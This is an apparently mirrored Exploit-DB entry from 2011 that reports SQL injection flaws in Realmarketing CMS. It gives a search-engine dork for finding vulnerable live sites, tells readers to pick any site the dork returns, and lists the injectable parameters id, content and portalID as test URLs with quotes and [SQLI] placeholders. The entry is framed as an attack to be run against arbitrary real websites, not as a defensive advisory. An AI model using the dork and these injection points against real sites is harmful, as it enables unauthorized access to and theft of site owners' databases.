Realmarketing CMS – Multiple SQL Injections

• Exploit Database
• 9 阅读

• 作者： ^Xecuti0N3r
  日期： 2011-04-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17206/

• #(+)Exploit Title: Realmarketing CMS System Sensitive Database Disclosure Vulnerability
  #(+)Author : ^Xecuti0n3r
  #(+) Date: 22.04.2011
  #(+) Hour: 13:37 PM
  #(+) E-mail:xecuti0n3r()yahoo.com
  #(+) dork: intext:realweb.de inurl:default.php
  #(+) Category: Web Apps [SQli]
   
  ____________________________________________________________________
  ____________________________________________________________________
   
  Choose any site that comes up when you enter the dork intext:"intext:realweb.de inurl:default.php" in search engine
   
   
  *SQL injection Vulnerability*
  
  #[+]http://site.com/default.php?id='125
  #[+]http://site.com/default.php?id=[SQLI]
  #[+]http://site.com/default.php?content='2485
  #[+]http://site.com/default.php?content=[SQLI]
  #[+]http://site.com/default.php?portalID='68
  #[+]http://site.com/default.php?portalID=[SQLI]
  #[+]http://site.com/default.php?&id='121
  #[+]http://site.com/default.php?&id=[SQLI] 
  ____________________________________________________________________
  ____________________________________________________________________
   
  ########################################################################
  (+)Exploit Coded by: ^Xecuti0n3r
  (+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
  ########################################################################